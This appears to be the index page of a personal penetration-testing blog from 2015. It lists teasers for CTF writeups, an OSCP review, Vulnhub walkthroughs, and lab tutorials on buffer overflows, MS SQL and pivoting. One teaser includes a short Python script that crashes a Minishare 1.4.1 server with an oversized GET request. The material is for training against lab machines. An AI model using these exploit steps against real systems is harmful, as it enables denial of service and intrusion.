Posts

Showing posts from 2015

CTF Hack Dat Kiwi Writeups

Image
I've participated in a CTF hack dat kiwi held on 19th and 20th November 2015. The CTF was organized by Abius X. Let me tell you this was one of the finest CTF that I've every participated.
Everything was awesome and organised.

I've solved few challenges and was at 234th rank http://hack.dat.kiwi/scoreboard (Handle: Transformers)


SSL_Sniff 1 (50 points) A wireshark file was given (dump.pcap) can be found
https://www.dropbox.com/s/85f7kipys931m8n/dump.pcap?dl=0


MY OSCP REVIEW

Image
MY OSCP REVIEW
About me I am just a guy who has done B.E (Computer Engineering), C.E.H and I am doing vulnerability assessment for different clients in Mumbai.

Inspiration to do OSCP Wanted to read technical stuff only then skip this para. Like other guyz I thought that OSCP is one of the most difficult task in the world of IT Security.
And yes, it is one the difficult mission you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing, I wanted to do some more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment used to be critical most of the time and time for completing the task was less.
So I asked few question on some group in facebook regarding How can I learn more exploitation stuff.
There was a guy with the name Mr.WhiteW0rm who have given me a brilliant answer and recommended me to do OSCP. That time I thought though I won't be able to do OSCP but at least I'll study in i…

Walkthrough Tr0ll 2 VM (Vulnhub)

Image
Tr0ll 2 vulnerable VM walkthrough.

1) Nmap scan:


EchoServer (Strcpy) bufferoverflow Securitytube Exploit research Megaprimer

Image
This blog is all about Exploit Research Video #3 form Pentester Academy/Security Tube. The exploit Research Megaprimer can be found on http://www.securitytube.net/groups?operation=view&groupId=7

Here I will be demonstrating buffer overflow on a strcpy or echo server that is written in c programming language by Vivek Ramachandran.

All you need to do is double click on the Server-strcpy.exe file to run the server.

Configuration/Setup:

Whitehat Wargame websecurity challenges

Image
Walkthrough of some Web security challenges that are present at Whitehat wargame
https://wargame.whitehat.vn/Challenges/List/2

Note: It is the walkthrough of challenge that is present not at the above link.
It is not a CTF
WebSecurity Challenge Web001


Pentester Academy Command Injection ISO basilic 1.5.14 exploit

Image
Pentester academy has launched a Command Injection ISO virtual image of Ubuntu with lots of real world vulnerable application framework.

Refer the following link for download and information purpose:
https://www.vulnhub.com/entry/command-injection-iso-1,81/
http://www.pentesteracademy.com/course?id=12

Lab setup:
1) Kali linux (Bridged or NAT) . My Kali Linux Ip was 192.168.1.102
2) Command Injection ISO (Bridged or NAT). My target IP was 192.168.1.103

Login into command injection ISO with user name securitytube and password 123321 to check for the DHCP ip address allocated or simply do a ping scan (nmap -sn)

Checking out for port 80 on Command Injection ISO (192.168.1.103)


Minishare 1.4.1 Bufferoverflow

Image
You can download the server from:
https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0

Exploit code in ruby:
https://www.exploit-db.com/exploits/616/

The vulnerability is a long URL in the GET request.
Eg:- GET AAAAAAAAAAAAAAAA..... HTTP/1.1

Lab Setup: 1) Windows xp ( I am using windows xp sp1)
2) Immunity debugger installed on the windows xp machine.
3) Minishare 1.4.1 installed on windows xp running on port 80.
2) Kali linux for scripting and exploiting.

Configure the victim: I have installed Minishare server 1.4.1 and it is listening for connections on port 80, as depicted below.


Generate Sample script to crash: We will try to smash the stack by sending a buffer of 2000 A's with the help of the following script.

#!/usr/share/python
import socket,sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
buff="GET "
buff+="A"*2000
buff+=" HTTP/1.1\r\n\r\n"
s.send(buff)
s.close()


Execute the exploit.It is observed t…

MS SQL Pentest

Image
In few of me internal pentest engagement I was able to enumerate IP and credentials of database server, either by brute-forcing or searching the code for database connect string.

     In last 6months I got the database credentials twice in client side code excluding the successful brute-force.

    Previously when I use to get the credentials, I try to connect the server using a local client. Eg. If I get credentials of MS SQL Server then I download some client for it and try to view the database.

    This time I was not really interested in doing that. Instead I was thinking to escalate my privilege and do something more than just viewing the database, because when I was reading the walk-through of Kioptrix it states that we can gain code execution using some commands executing in sql format.

   So I googled ways to enumerate mssql and I got a very good link https://www.offensive-security.com/metasploit-unleashed/admin-mssql-auxiliary-modules/



Port forwarding and pivoting

Image
"This blog is already published on infosecinstitute"


In computer networking, port forwarding or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall. This technique is most commonly used to make services on a host residing on a protected or masqueraded (internal) network available to hosts on the opposite side of the gateway (external network), by remapping the destination IP address and port number of the communication to an internal host

More info on Port forwarding

Lab Setup: Requirement
        Three Machine
        1 - Attacker (Kali)
        2 - WinXP
        3 - Linux (Metasploitable or any vulnerable Linux Machine).

Vmware IP Setup
Attacker
        eth0 - (C Class IP) eg. 192.168.1.104
WinXP
        1 Ethernet - (C Class IP) eg.1 92.168.1.131
        2 Ethernet - (A Class IP) e…

De-Ice 1.20b Walkthrough

Image
Well 15 days back I have written Walk-through of De-Ice 1.120a On My Blog. I got great response by vulnhub and they published my walk-through  https://www.vulnhub.com/author/trnform3r,152/
With a such a warm encouragement I feel like writing more walk-through.

Here Is my walk-through on De-Ice 1.20b. You can download the VM and get more info about it form here.

Note: The attacker machine and the VM should be in the subnet of 192.168.1.0/24

Labsetup:  1 - Open Vmware - > Edit - >"Virtual Network Editor"
2 - Click on "Add Network" and add any 1 Network example VMnet2
3 - Select VMnet2 and change Subnet IP - 192.168.1.0 and Subnet mask -
255.255.255.0 also select "Host - Only"
4 - Now add this adapter VMnet2 for both the machine.

When you start the VM it looks something like this.



De-Ice 1.120a Walkthrough

Image
Few days back my friend Chetan told to get hands on De Ice and Kioptrix series before taking PWK labs.The very next weekend I started with De-Ice http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso . As my bridge network was on 192.168.1.x series I thought of doing De-Ice 1.120a just by bridging the VM. One of the awesome URL that I found today was https://blog.g0tmi1k.com/2011/03/vulnerable-by-design/ .
Enumeration:I started with nmap as usual to find all the open ports. I usually use version detection and aggressive scan in nmap.